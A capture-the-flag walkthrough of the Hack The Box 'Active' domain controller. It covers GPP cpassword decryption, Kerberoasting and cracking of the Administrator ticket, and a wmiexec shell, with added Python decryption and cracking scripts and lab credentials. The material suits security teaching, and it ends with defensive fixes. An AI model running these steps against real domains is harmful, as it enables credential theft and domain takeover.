Lab: Hack The Box
System: Windows
Topics: basic AD enumeration, GPP (Group Policy Preferences) passwords, Kerberoasting
A standard teaching box.
Port scan results:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -14m12s
| smb2-time:
| date: 2024-12-12T07:21:17
|_ start_date: 2024-12-07T09:05:59
Enumerate SMB shares with a null session (anonymous login):
~/D/a $smbclient -NL $IP
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The only unusual share is Replication; download its entire contents recursively.
~/D/a $smbclient //$IP/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 10:37:44 2018
.. D 0 Sat Jul 21 10:37:44 2018
active.htb D 0 Sat Jul 21 10:37:44 2018
smb: \> RECURSE on
smb: \> PROMPT off
smb: \> mget *
Inside is a Groups.xml:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
It contains a username, SVC_TGS, and a cpassword value. This is a Group Policy Preferences (GPP) password.
GPP stores account passwords in SYSVOL in a form anyone can decode: cpassword is the base64 of the AES-256-CBC encryption (zero IV) of the UTF-16LE password, and the 32-byte key is published in Microsoft's MS-GPPREF specification. Every domain user can read SYSVOL, and on this box the Replication share exposes the same tree anonymously, so the "encryption" protects nothing. MS14-025 (KB2962486) stopped GPP from writing new cpassword values but left existing Groups.xml files in place, which is why they still turn up in older domains.
~/D/a $gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
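What gpp-decrypt does under the hood, as an added example that is not part of the original writeup. It implements AES-256-CBC decryption in plain Python (no third-party module) so that the published key, the zero IV and the PKCS#7/UTF-16LE unwrapping are all visible; the S-box is generated rather than typed in. The only input is the cpassword string from the Groups.xml above; the function names are this example's own.

```python
import base64

# 32-byte AES key published in MS-GPPREF section 2.2.1.1.4 ("Password Encryption").
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
# cpassword value copied from the Groups.xml found on the Replication share.
CPASSWORD = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"


def _build_sbox():
    """Derive the AES S-box (GF(2^8) inverse, then the affine map) instead of hard-coding 256 values."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF  # p *= 3 (3 generates GF(2^8)*)
        q = (q ^ (q << 1)) & 0xFF                                 # q /= 3, so p * q == 1 always
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        x = q
        for n in (1, 2, 3, 4):                                    # affine transform of the inverse
            x ^= ((q << n) | (q >> (8 - n))) & 0xFF
        sbox[p] = x ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]


def _xtime(a):
    a <<= 1
    return (a ^ 0x1B) & 0xFF if a & 0x100 else a


def _gmul(a, b):
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def expand_key(key):
    """AES-256 key schedule: 8 key words -> 60 words -> 15 round keys of 16 bytes."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(8)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]              # extra SubWord, Nk = 8 only
        w.append([w[i - 8][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]


def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out


def aes256_decrypt_block(round_keys, block):
    """FIPS-197 inverse cipher on one 16-byte block; state index is 4*col + row."""
    s = [a ^ b for a, b in zip(block, round_keys[14])]
    for rnd in range(13, -1, -1):
        s = [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]  # InvShiftRows
        s = [INV_SBOX[b] for b in s]                                        # InvSubBytes
        s = [a ^ b for a, b in zip(s, round_keys[rnd])]                     # AddRoundKey
        if rnd:                                                             # no InvMixColumns in the last round
            s = _inv_mix_columns(s)
    return bytes(s)


def gpp_decrypt(cpassword):
    """Groups.xml cpassword -> base64 (padding restored) -> AES-256-CBC, zero IV -> PKCS#7 -> UTF-16LE."""
    ct = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))  # GPP strips the '=' padding
    if not ct or len(ct) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    rk = expand_key(GPP_KEY)
    prev, pt = bytes(16), b""                                          # IV is all zeros
    for i in range(0, len(ct), 16):
        block = ct[i:i + 16]
        pt += bytes(a ^ b for a, b in zip(aes256_decrypt_block(rk, block), prev))
        prev = block
    pad = pt[-1]
    if not 1 <= pad <= 16 or pt[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or damaged cpassword")
    return pt[:-pad].decode("utf-16-le")


if __name__ == "__main__":
    print(gpp_decrypt(CPASSWORD))
```

The padding check is the first thing that fails when a cpassword was mangled while copying out of the XML, and the UTF-16LE decode is why the password is half the length of the decrypted bytes.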
Check that the svc_tgs credentials are valid:
~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
Enumerate domain users and groups by brute-forcing RIDs over SMB (any authenticated domain account can do this):
~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --rid-brute
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC 498: ACTIVE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.10.100 445 DC 500: ACTIVE\Administrator (SidTypeUser)
SMB 10.10.10.100 445 DC 501: ACTIVE\Guest (SidTypeUser)
SMB 10.10.10.100 445 DC 502: ACTIVE\krbtgt (SidTypeUser)
SMB 10.10.10.100 445 DC 512: ACTIVE\Domain Admins (SidTypeGroup)
SMB 10.10.10.100 445 DC 513: ACTIVE\Domain Users (SidTypeGroup)
SMB 10.10.10.100 445 DC 514: ACTIVE\Domain Guests (SidTypeGroup)
SMB 10.10.10.100 445 DC 515: ACTIVE\Domain Computers (SidTypeGroup)
SMB 10.10.10.100 445 DC 516: ACTIVE\Domain Controllers (SidTypeGroup)
SMB 10.10.10.100 445 DC 517: ACTIVE\Cert Publishers (SidTypeAlias)
SMB 10.10.10.100 445 DC 518: ACTIVE\Schema Admins (SidTypeGroup)
SMB 10.10.10.100 445 DC 519: ACTIVE\Enterprise Admins (SidTypeGroup)
SMB 10.10.10.100 445 DC 520: ACTIVE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.10.100 445 DC 521: ACTIVE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.10.100 445 DC 553: ACTIVE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.10.100 445 DC 571: ACTIVE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.10.100 445 DC 572: ACTIVE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.10.100 445 DC 1000: ACTIVE\DC$ (SidTypeUser)
SMB 10.10.10.100 445 DC 1101: ACTIVE\DnsAdmins (SidTypeAlias)
SMB 10.10.10.100 445 DC 1102: ACTIVE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.10.100 445 DC 1103: ACTIVE\SVC_TGS (SidTypeUser)
With the svc_tgs credentials, list the shares again and then browse the Users share, which anonymous access could not read.
~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
~/D/a $smbclient //$IP/Users -U 'svc_tgs%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 14:39:20 2018
.. DR 0 Sat Jul 21 14:39:20 2018
Administrator D 0 Mon Jul 16 10:14:21 2018
All Users DHSrn 0 Tue Jul 14 05:06:44 2009
Default DHR 0 Tue Jul 14 06:38:21 2009
Default User DHSrn 0 Tue Jul 14 05:06:44 2009
desktop.ini AHS 174 Tue Jul 14 04:57:55 2009
Public DR 0 Tue Jul 14 04:57:55 2009
SVC_TGS D 0 Sat Jul 21 15:16:32 2018
Nothing useful in the user profile folders. Next, check whether any user account has a Service Principal Name (SPN) registered, i.e. whether it is Kerberoastable:
~/D/a/s $impacket-GetUserSPNs $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40.351723 2024-12-07 11:21:48.223544
Request a service ticket (TGS) for that SPN and dump it in a crackable format:
~/D/a/s $impacket-GetUserSPNs $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip $IP -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40.351723 2024-12-07 11:21:48.223544
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$15beb8c9ee1a6d1e497ca5873b10a1cf$... (ciphertext truncated)
~/D/a/s $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2024-12-12 08:57) 0.2710g/s 2855Kp/s 2855Kc/s 2855KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
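Why an etype 23 ticket cracks in three seconds, as an added example that is not part of the original writeup. It reproduces the check john performs per candidate on a $krb5tgs$23$ line and cracks a constructed sample: the ticket on the page is truncated, so the sample is built here from a placeholder body and the password recovered above. Key usage 2 and the RC4-HMAC construction follow RFC 4757; MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3. The function names, the placeholder body and the wordlist are this example's own.

```python
import hashlib
import hmac
import os
import struct


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is frequently disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:
                f, k, s, add = F, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, add = G, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, add = H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + f(b, c, d) + X[k] + add) & 0xFFFFFFFF, s), b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """The RC4-HMAC (etype 23) long-term key is the unsalted NT hash: MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


TICKET_KEY_USAGE = 2  # RFC 4120 key usage for a ticket's enc-part (what the KDC seals with the service key)


def rc4_hmac_encrypt(key, plaintext, usage=TICKET_KEY_USAGE):
    """RFC 4757 RC4-HMAC: returns (checksum, edata), the last two fields of a $krb5tgs$23$ line."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = os.urandom(8) + plaintext  # 8-byte random confounder
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def rc4_hmac_check(key, checksum, edata, usage=TICKET_KEY_USAGE):
    """One guess costs MD4 + two HMAC-MD5 + RC4, with no salt and no iteration count."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)


def build_krb5tgs(user, realm, spn, password, enc_part):
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), enc_part)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def crack_krb5tgs(line, wordlist):
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled; AES etypes 17/18 use PBKDF2")
    *_, checksum_hex, edata_hex = line.split("$")
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), checksum, edata):
            return candidate
    return None


# Constructed sample: a placeholder stands in for the real ASN.1 EncTicketPart; the
# service account password is the one john recovered above.
SAMPLE_HASH = build_krb5tgs("Administrator", "ACTIVE.HTB", "active/CIFS:445",
                            "Ticketmaster1968", b"constructed EncTicketPart placeholder")
WORDLIST = ["password", "Tiffani1432", "Thrash1", "Ticketmaster1968", "Summer2018!"]

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack_krb5tgs(SAMPLE_HASH, WORDLIST))
```

Because the key is the raw NT hash, a guess is verified with one MD4 and two HMAC-MD5 calls; AES tickets (etype 17/18) derive the key with PBKDF2-HMAC-SHA1 over 4096 iterations and are orders of magnitude slower to attack. The defensive fix is the usual one: long random passwords or gMSAs for accounts that must carry SPNs, no SPN on privileged accounts like Administrator, and RC4 disabled for service accounts so the KDC issues AES tickets only.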
Cracking returns the Administrator password, which gives a shell on the DC. The SPN belongs to the built-in Administrator account, so a crackable service password here is a full domain compromise:
~/D/a/s $netexec smb $IP -u administrator -p Ticketmaster1968
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
~/D/a/s $impacket-wmiexec $DOMAIN/administrator:'Ticketmaster1968'@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator